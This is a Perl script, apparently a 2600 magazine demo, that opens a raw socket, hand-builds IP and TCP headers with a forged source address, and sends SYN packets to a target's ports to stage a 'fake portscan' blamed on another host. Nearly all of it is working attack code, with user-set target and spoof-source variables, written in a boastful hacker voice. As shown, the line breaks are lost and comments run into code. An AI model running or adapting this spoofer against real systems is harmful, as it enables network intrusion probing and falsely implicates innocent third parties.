#!/usr/bin/perl # # lego # perl spoofer demo prog # written for 2600 # # based on slapfro, alpha version # written by miff # # TCP fake portscan only. # # shout outs: shinex. # use Socket; use strict qw(refs, subs); #SOURCE AND DESINTATION PARAMETERS # MUST CHANGE THESE. my $target_box = "chrome.9mm.com"; my $target_low_port = "23"; my $target_hi_port = "23"; my $source_box = "funhouse.9mm.com"; my $source_starting_port = "10000"; tcpsp00f($target_box,$target_low_port,$target_hi_port,$source_box,$source_starting_port); sub tcpsp00f { my ($dest_host,$dest_port_low,$dest_port_hi,$src_host,$src_port) = @_; #set constants: my ($PROTO_RAW) = 255; # from /etc/protocols my ($PROTO_IP) = 0; #ditto my ($IP_HDRINCL) = 1; #we set the ip header, thanks #look up mah shit... $dest_host = (gethostbyname($dest_host))[4]; $src_host = (gethostbyname($src_host))[4]; #time to open a raw socket.... socket(S, AF_INET, SOCK_RAW, $PROTO_RAW) || die $!; #raw socket should be open... #now set the bad boy up... setsockopt(S, $PROTO_IP, $IP_HDRINCL, 1); my ($port) = $dest_port_low; print "\n INITIATING FAKE PORTSCAN \n\n"; while ($port <= $dest_port_hi) { $src_port++; #build a tcp header: my ($packet) = givehead($src_host, $src_port, $dest_host, $port, $data); #bust out the destination... my ($dest) = pack('S n a4 x8', AF_INET, $port, $dest_host); #send a fux0ring packet send (S,$packet,0, $dest); $port++; } print "\n portscan sent, beeyatch \n\n "; } sub givehead { my ($src_host, $src_port, $dest_host, $dest_port, $data) = @_; #HERE WE PLAY WITH THE INSIDES OF THE TCP PIECE #AND CALC THE TCP HDR CHECKSUM. my $hdr_cksum = 0; # we set it to 0 so we can calculate it my $zero = 0; #might need a zero from time to time my $proto_tcp = 6; # the protocol number for tcp my ($tcplength) = 20; # 20 byte tcp hdr; no data # IF YOU ADD DATA, MAKE SURE TO ADD ITS PACKED LENGTH # TO THE TCPLENGTH HERE!!! # all of the source and destination infoz is passed to us # screw wit it in the parent routine... my $syn = 790047533; # random syn; try to keep it under 32 bits :) my $ack = 0; # zero ack; try to keep it under 32 bits :) my $tcp_4bit_hdrlen = "5"; # 5 * 32bit (4 byte) = 20 bytes my $tcp_4bit_reserved = 0; # reserved for 0 my $hdr_n_reserved = $tcp_4bit_hdrlen . $tcp_4bit_reserved; # pack them together my $tcp_urg_bit = 0; # URGENT POINTER BIT my $tcp_ack_bit = 0; # ACKNOWLEDGEMENT FIELD BIT my $tcp_psh_bit = 0; # PUSH REQUEST BIT my $tcp_rst_bit = 0; # RST (RESET CONNXION) BIT my $tcp_syn_bit = 1; # SYN FLAG BIT #its a syn!! my $tcp_fin_bit = 0; # FIN FLAG BIT # here we put together 2 reserved fields and the 6 flags to pack as binary. my $tcp_codebits = $zero . $zero . $tcp_urg_bit . $tcp_ack_bit . $tcp_psh_bit . $tcp_rst_bit . $tcp_syn_bit . $tcp_fin_bit; my $tcp_windowsize = 124; # default window size my $tcp_urgent_pointer = 0; # urgent pointer # the following is not a tcp header per se, but a pseudo header # used to calculate the tcp checksum. yes, its a pain in the ass. my ($pseudo_tcp) = pack ('a4 a4 C C n n n N N H2 B8 n v n', $src_host,$dest_host,$zero,$proto_tcp, $tcplength,$src_port,$dest_port, $syn,$ack, $hdr_n_reserved,$tcp_codebits, $tcp_windowsize,$zero,$tcp_urgent_pointer); my ($tcp_chksum) = &checkfro($pseudo_tcp); # PLAY WITH THE INNARDS OF THE IP PIECE HERE!!! my $ip_version = "4"; # (nybble) tcp/ip version number (current is 4) my $ip_hedlen = "5"; # (nybble) number of 32-bit words in ip header my $ver_n_hlen = $ip_version . $ip_hedlen; # we pack 2 nybbles together my $ip_tos = "00"; # (byte) ip type-of-service my ($totlength) = $tcplength + 20; #tcp + 20 byte ip hdr ## ## we'll pack totlength into 2 bytes in the packet my $ip_fragment_id = 31337; # 2 bytes as well. my $ip_3bit_flags = "010"; # ip fragmentation flags (3 bits) (frag, do not frag) my $ip_13bit_fragoffset = "0000000000000"; #fragment offset my $ip_flags_n_frags = $ip_3bit_flags . $ip_13bit_fragoffset; my $ip_ttl = 64; # 64 seconds / hops # we have proto_tcp from above... my $proto_tcp = 6; # we have hdr_checksum from above... # all source and destination infoz is passed to us (it # gets set in parent routine) # change $syn and $ack above in tcp section # in fact, everything else in the packet is set above. my ($hdr) = pack ('H2 H2 n n B16 C2 n a4 a4 n n N N H2 B8 n v n', $ver_n_hlen, $ip_tos, $totlength, $ip_fragment_id, $ip_flags_n_frags,$ip_ttl, $proto_tcp, $hdr_cksum, $src_host, $dest_host, # end of ip header, begin tcp header $src_port, $dest_port, $syn,$ack, $hdr_n_reserved,$tcp_codebits, $tcp_windowsize,$tcp_chksum,$tcp_urgent_pointer); return $hdr; } sub checkfro { #dis sekzhun robbed from someplace else.... my ( $msg # The message to checkfro ) = @_; my ($len_msg, # Length of the message $num_short, # The number of short words in the message $short, # One short word $chk # The checkfro ); $len_msg = length($msg); $num_short = $len_msg / 2; $chk = 0; foreach $short (unpack("S$num_short", $msg)) { $chk += $short; } # Add some lead $chk += unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2; $chk = ($chk >> 16) + ($chk & 0xffff); # bust out mah fro pic return(~(($chk >> 16) + $chk) & 0xffff); # spray some jheri }